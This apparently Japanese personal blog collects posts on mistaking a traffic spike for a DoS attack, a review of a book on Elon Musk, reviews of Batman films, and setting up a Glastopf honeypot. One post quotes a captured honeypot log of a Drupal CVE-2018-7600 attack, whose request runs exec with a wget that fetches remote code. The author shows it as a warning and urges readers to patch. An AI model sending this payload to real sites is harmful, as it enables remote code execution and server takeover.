DoS攻撃かと思ったよ
今日帰ってきて、何気なくこのブログのアクセスを見たところ、アクセス数が100を余裕で超えていて、驚きました。 その時僕はこう思いました。 俺終わった。。。 先日、Drupalの脆弱性の件を注意喚起したせいで、攻撃者を本気で怒らせてしまったと、このとき僕は本当に思いました。 僕はなんてことをしてしまったんだろ。。。
だって、1日数十程度しかないブログのアクセス数が急に100を余裕で超えるアクセスがあるなんて、考えられないでしょ。。。
でも、しばらくたって考えてみるとDoS攻撃にしては弱いなと思い、Googleアナリティクスを見たら、参照元がツイッターのアクセスが多かったので、ツイッターを検索してみたところ、僕の記事がツイートされて紹介されていることが判明しました。
僕の記事を読んでくれる人がいてくれるだけで嬉しいのに、ツイッターで紹介までしてくれて、 本当にうれピー!
世の中の凄いブロガーさんからすると、全然たいしたことないアクセス数かもしれませんが、僕にとって1日100アクセスを超えるなんて、夢のまた夢だと思ってました。
今後もみなさまのお役に立てるよう有益な情報を提供するということを心がけて、精進して参りたいと思います! (新人ハニーポッターである僕は、急なアクセスが来ると、どうしてもDoS攻撃を疑ってしまうので、しばらく慣れが必要かもしれません。笑)
【書評】改めてイーロンの凄さを知る『イーロン・マスク 世界をつくり変える男』
書店にふらっと立ち寄って、気になった『イーロン・マスク 世界をつくり変える男』を読んだので、その感想です。
- 作者: 竹内一正
- 出版社/メーカー: ダイヤモンド社
- 発売日: 2018/01/25
- メディア: 単行本(ソフトカバー)
- この商品を含むブログを見る
イーロンさんはテスラやスペースXなど、世間からしたら割とブッとんでいることを平行してやっているので、前から好きでしたが、この本を読んでイーロンさんの作ろうとしている未来や考え方などを知ることができて、ますます好きになりました。
この本で印象に残ったことを述べていきたいと思います。
失敗は成功の必要条件
よく失敗を恐れるなと成功した人の物語をみると、よくこんな感じのことが紹介されていますが、イーロンさんの場合、そもそも失敗は起こるものとして、物事を捉えていることに驚きでした。
失敗を恐れるな。これはよく言われることですが、イーロン・マスクを見ていると「失敗を恐れる、恐れない」という領域を超えて、そもそも「失敗は起こるもの」と平然と受け入れているように感じます。新しいことをやろうと思ったら、失敗を許容しなければならない。本書のテーマでもある「世界をつくり変え、未来を創造する」というのなら、なおさら失敗を避けては通れません。フェイスブックのマーク・ザッカーバーグはハーバード大の学生の前で、失敗についてこんな話をしていました。「J・K・ローリングはハリー・ポッターを出版できるまでに12回も断られた。ビヨンセですら"Halo"を作るまでに何百曲と作ったんだ。大きな成功は『失敗する自由』によって生まれるんだよ」。失敗は成功への必要条件なのです。 竹内一正.イーロン・マスク 世界をつくり変える男(Kindleの位置No.618-625).ダイヤモンド社.Kindle版.
失敗を恐れる、恐れないということではなく、新しいことをやっているのだから、失敗して当然というマインドで行動しているのは、イーロンさんにとっては当然といえば当然なのですが、僕はどこかで失敗を恐れながら仕事をしていて、この考えはなかったです。
僕はこれまで仕事で数え切れないくらいたくさんの失敗をしてきたのですが、少なからず新しいことに挑戦していたり、極限状態まで追い込んだ状態で失敗しているので、失敗は起こるべくして起こったと考えると、失敗して当然ということになります。(こんなことを上司に言ったら、激怒されると思いますが。笑)
イーロンさんの場合、スペースXで起こった数々の失敗を公開しているのも驚きでした。
こちらの動画でよくまとめられていますので、スペースXでこれまでどんな失敗が起こったか分かると思います。
最後の方はロケットが綺麗に逆噴射して、着陸する動画も写っていて、感動しました!
人生新しいことの連続なので、失敗を恐れる、恐れないではなく、失敗は起こるものとして覚悟を決めておくとよいかもしれません。
暗黒な領域に割って入る
ここでいう暗黒な領域とは、既得権益でガチガチに守られた産業や業界のことを指します。
イーロンさんが挑戦している事業は、どれも既存の会社や業界が高い壁となって立ちはだかっていて、実際のところはかなり苦労しているようです。
ただ、そこに関してイーロンさんは一切妥協せず、相手が誰であろうと自分の信念を曲げるようなことはせず、言うべきことは言うという姿勢を見せています。
どんなに分厚い壁でも叩き続ければいつしかヒビが入る。スペースXの破格のコスト力は、国防に強い発言力を持つマケイン上院議員でさえ動かし、彼の口から「これまでの軍事衛星打ち上げ契約の見直しをすべきだ」との発言を引き出したのです。事実、ファルコン9を使えば、米空軍が年間で10億ドルの節約ができる。これまでの実績だの、伝統だのを超えて、コストの力は絶大だったのです。 竹内一正.イーロン・マスク 世界をつくり変える男(Kindleの位置No.1615-1619).ダイヤモンド社.Kindle版.
それに対し、徐々に国民も気づいて、社会がシフトしていくという流れを作り出せるイーロンさんは、やっぱり凄いと思いました。
ここらへんが非常におもしろいところで、たとえば、NASAや国防総省がスペースXを使わず、相変わらずロッキード・マーチンやボーイングばかりを使い続けていたら、当然、国民は「なぜ、安いスペースXを使わないんだ!」「税金の無駄づかいをしているんじゃないか」と文句を言うでしょう。すると議員たちも分が悪い。そんな微妙な力関係が働いてくるのです。 竹内一正.イーロン・マスク 世界をつくり変える男(Kindleの位置No.738-742).ダイヤモンド社.Kindle版.
日本の場合でも、ガチガチで守られている業界、産業はたくさんあると感じますので、最初は全く相手にされなくても、これまでにない全く新しいテクノロジーで徐々に成功例を作りだしていくことができれば、国民もそれに気づき社会を動かすことができると思いました。
自分自身に当てはめてみると、イーロンさんのような財力もなければ、能力もないですが、自分が将来こうしたいという思いがあるものに対し、わずかでもお金や時間を費やしていくことが大切なのかなと思いました。
とりあえず、テスラに投資することも視野に入れたいと思います。
圧倒的なスピードで物事を実行
イーロンさんが手がけている事業のどれを見ても、先進的で凄いのですが、僕が以前から気になっていたのは、彼のインプット法でした。
どんなやり方で知識をインプットしたら、こんな考えに行き着くのかずっと気になっていたので、この辺りのことについても、この本で紹介されていて、非常に勉強になりました。
イーロンさんの場合、分からないことがあったら、とにかく調べる、調べても分からなければ、その専門家を質問攻めにして、短時間で知識を九州し、短時間で深く考え、短時間で結論を出すということを繰り返しているようです。
つまり、スピードと行動力です。
イーロン・マスクは、わからないことがあると、現場のエンジニアを質問攻めにします。かつてスペースXで働いていたエンジニアはこんなことを語っていました。「僕に質問をふっかけることで、彼自身が勉強していたんですよ。あの人は、こちらの知識を90%くらい奪っていくまで質問をやめませんから」このエンジニアはさらっと話していますが、宇宙工学の専門家を向こうにして「相手の9割の知識を身につけるまで質問をやめない」というのはイーロンの特質をよく表しています。しかも、ダラダラと質問を続けるのではなく、短時間で密度の濃い質問をぶつけるのです。 竹内一正.イーロン・マスク 世界をつくり変える男(Kindleの位置No.1380-1383).ダイヤモンド社.Kindle版.
このあたりのハイスピードの思考スタイルは、今の社会では必要となると筆者は述べていらっしゃるので、とにかくスピードと行動力ということを意識して、僕も活動したいと思います。
まとめ
イーロン・マスクやべぇ!
Drupalを狙ったと思われるアタック(CVE-2018-7600)をキャッチ
先日より僕のハニーポットが動作しているのですが、さっそく怪しいアクセスをキャッチしたので、紹介します。
実際の僕のハニーポットで取得できたログはこんな感じです。
一応あれかなと思いアクセス元のIPアドレスは伏せてあります。
今回キャッチしたアクセスログはこんな内容です。
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 170 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2FXXX.XXX.XXX.XXX%2Fdrupal.php
調べてみるとコンテンツ管理システムであるDrupal(ドルーパル)を狙ったと思われる攻撃でした。
脆弱性情報として、3/28に公開されていて修正パッチが展開されておりますが、まだパッチ未適用のサイトを狙ったものと思われます。
この攻撃では、攻撃者が任意のコードを実行できるというものなので、最悪の場合乗っ取られる可能性がある脆弱性です。
4/16だけで僕のハニーポットに9件も攻撃が来ているので、かなり流行している攻撃のようです。
怖っ!
Drupal(ドルーパル)を導入している皆さんは早めのパッチ適用をしてくださいね!!!
【映画】ベインがゴリゴリの強さを発揮する『ダークナイト ライジング』の感想
最近見ているバットマン3部作の完結編である『ダークナイト ライジング』を見たので、その感想です。
- 発売日: 2013/11/26
- メディア: Amazonビデオ
- この商品を含むブログを見る
この映画でもっとも特徴的だったのは、異様なマスクを付けて、強靭な肉体を持っているベインだったかなと思います。
特に映画の序盤で、バットマンを完封と言えるぐらいにボコボコにして、倒してしまうという強さを持っているので、肉体的な強さという意味ではジョーカーよりも上をいく存在だと思います。
あの大きな体で超スピードで繰り出される連続パンチは、見事でした。
僕もベインのように大きな体を目指して、筋トレに励みたいと思いました。笑
ただ、今回の映画のストーリの内容は、単純でいまひとつという印象を受けました。
悪役であるベインが登場し、バットマンを一時的に倒すも、復活したバットマンにそれを阻止され、ゴッサムが救われるという単調なストーリーで映画は進んでいったかなと思いました。(実は黒幕はベインでなかったり、若手刑事が頑張ったりと細かい良さは色々とあるのですが。)
もう少し複雑なストーリーを構成することができれば、もっと面白くなったのではないかなと思いますが、今回の映画は3部作の完結編なので、こういった構成は致し方ないのかなと思いました。
これでバットマンの3部作をすべて観ましたが、トータル的に一番面白かったのは、『バットマン ダークナイト』が一番面白かったです。
やっぱりジョーカーという悪役が、かなり奥深かったというのが一番のポイントだったかなと思います。
- 発売日: 2013/11/26
- メディア: Amazonビデオ
- この商品を含むブログを見る
- 発売日: 2013/11/26
- メディア: Amazonビデオ
- この商品を含むブログを見る
今回の『ダークナイト ライジング』でバットマンはゴッサムを救うため、爆弾を沖で爆発させるため、自ら犠牲となったのですが、映画の最後で若手刑事がバットマンの秘密基地に入るところで終わったということは、次の新しいバットマンが期待できるではないかと思っています。
ただ、個人的には今回のブルースさんがバットマンという役にハマっていて、とても好きだったので、それを超えられるのかどうかが不安ですが、楽しみに待っておきたいと思います。
とは言いつつも、もう既に『バットマン vs スーパーマン ジャスティスの誕生』で新しいブルースが登場しているので、今回の続編はないかもしれませんが。。。
バットマン vs スーパーマン ジャスティスの誕生(字幕版)
- 発売日: 2016/07/12
- メディア: Amazonビデオ
- この商品を含むブログ (1件) を見る
ハニーポッターになりました(Glastopfデビュー)
以前の記事でもご紹介したのですが、今回Webアプリケーション型のハニーポットであるGlastopfをAWSのEC2にインストールしたので、手順を紹介したいと思います。
下記公式サイトで詳細な手順は記載されているので、あまりつまずくところはなかったのですが、pipコマンドでインストールしようとするとエラーになったので、今回はGithubから資材をダウンロードしてインストール形をとりました。
ちなみにOSはAWS側で用意されているUbuntu(Canonical, Ubuntu, 14.04 LTS, amd64 trusty image build on 2018-03-08)を使用しました。
- 各種インストール
- PHP sandboxのインストールと設定
- いよいよGlastopfのインストール
- 設定と起動
【映画】ブルースがかっこよすぎる『バットマン ビギンズ』の感想
見る順番を間違えてしまったのですが、アマゾンプライムで『バットマン ビギンズ』を見たので、その感想です。
- 発売日: 2013/11/26
- メディア: Amazonビデオ
- この商品を含むブログを見る
この映画ではバットマンのルーツとなるストーリー構成となっているのですが、何と言っても、今回はブルース・ウェイン中心の物語となっているので、ブルース・ウェインのことについて触れていこうと思います。
異次元の金持ち
ブルース・ウェインは代々続く、富豪の息子として登場しますが、その金持ちっぷりが異次元すぎてすごいです。
ホテルのレストランの店員から注意を受けたかと思えば、ホテルごと小切手で買い取ってしまったり、公開された会社の株を買い占めて自分のものにしてしまったり、豪邸が全焼した際は同じものを作ると言ったり、桁違いの金使いを映画の中で見せますが、見ている側からすると異次元過ぎて、清々しい気持ちになりました。笑
異常な好奇心
ブルース・ウェインは幼少期に目の前で、両親が殺害されたということから、異常なくらい「悪」に対して、興味を抱くようになります。
映画のはじめのシーンでは、犯罪社会を身をもって学ぶために、自ら犯罪に手を染め、刑務所に収容され、暴力を受けるところから始まり、好奇心というか探究心がものすごいと感じました。
その他にも、ウェイン産業で製作された様々な武器や乗り物を次々と自分で試してみたりと好奇心が旺盛なところがうかがえます。
自分が気になることがあったら直ぐにに行動に移す、とりあえずやってみるということは大切だなと改めて思いました。
そういえば、このブログもタイトル通り、とりあえずやってみる精神で始めたものなので、僕もブルースのように自分が気になることがあったら、失敗を恐れず、どんどん挑戦していきたいと思います。(挑戦して成功したことだけをブログで紹介するだけではなく、失敗したこともご紹介できればと思います。)
独身貴族を謳歌している
ブルースは幼馴染のレイチェルが好きなのですが、独身貴族を謳歌しているように映画の中で振る舞います。
ブルースはバットマンという正体を隠すために、あえてプレイボーイ風を装っているということなのですが、見ている側からすると独身貴族を謳歌しているように見え、非常に羨ましいです。笑
家に帰れば、信頼できる執事がいて、かっこいい車を持っていて、お金もたくさんあり、モテる。
超羨ましいです。。。
こんなステータスであれば、独身のままでいるということも、それはそれで幸せなことなのかなと思ってしまいます。
こういう生き方もありだなと思いましたが、それは経済的自由という自由を手に入れたブルースだからできることだと思いますので、僕も経済的な自由を得るために、いろいろなことを挑戦していきたいと思います。
- 作者: ロバートキヨサキ,シャロン・レクター(公認会計士),白根美保子
- 出版社/メーカー: 筑摩書房
- 発売日: 2000/11/09
- メディア: 単行本
- 購入: 71人 クリック: 1,223回
- この商品を含むブログ (534件) を見る
とりあえず、ブルースかっこよすぎでしょ!
ハニーポットを作りたい
最近九州商船の記事を見て、セキュリティ対応の重要性を感じておりますが、僕のAWS環境もmessagesログを見ると、確かに不審なアカウントでアクセスしようとしている痕跡があったりするので、インターネットの世界は攻撃だらけなのかなと思っています。
九州商船の報告書を見ると、攻撃者はかなり計算された手口を使って、サーバを乗っ取り、マイニングに使用していることが伺えますので、世の中にはいろんな攻撃手法があって、日々進化しているものと思われます。
どんな攻撃が世の中で流行しているのか1人のエンジニアとして、知りたいという好奇心があるので、ハニーポットを作りたいと思います。
そもそも、ハニーポットとは何なのかというと、
ハニーポットは、侵入者を騙す最新侵入検知技法であり、まるで実際の攻撃を受けたかのようにしてクラッカーを追跡し、情報を収集します。 【3分ITキーワード】 ハニーポット(Honey Pot) - ペンタPRO:ペンタセキュリティが提供するセキュリティ情報まとめサイト
とはいえハニーポットを作って、人様のシステムにご迷惑をかけるのは避けたいので、慎重に作っていこうと思います。
ハニーポッドの種類について
調べて見るとハニーポッドには大きく2種類があることが分かりました。 本物のOSやソフトウェアをハニーポットとして利用する「高対話型ハニーポット」とOSやソフトウェアをエミュレートした「低対話型ハニーポット」があることが分かりました。
それぞれのメリット、デメリットは下記のとおりです。
高対話型ハニーポット
メリット
本物のOSやソフトウェアを使用するので、実際の生の情報が取得できる。
デメリット
侵入されたときのリスクが大きい。 (確かに侵入されて、完全に乗っ取られてしまった場合は、他のシステムにご迷惑をかける可能性があります。)
低対話型ハニーポット
メリット
本物に比べ機能が制限されているため、高対話型ハニーポットより安全。
デメリット
機能を限定しているため、取得する情報が限られてしまう。
ということなので、ハニーポット初心者の僕としては、まず「低対話型ハニーポット」で慣れてから、本物のOSやソフトウェアを使用する「高対話型ハニーポット」を使用していくということにしたいと思います。
まずは、低対話型ハニーポットにはどんな種類のものがあるのか調べるところから始めたいと思います。
今回はこの辺で!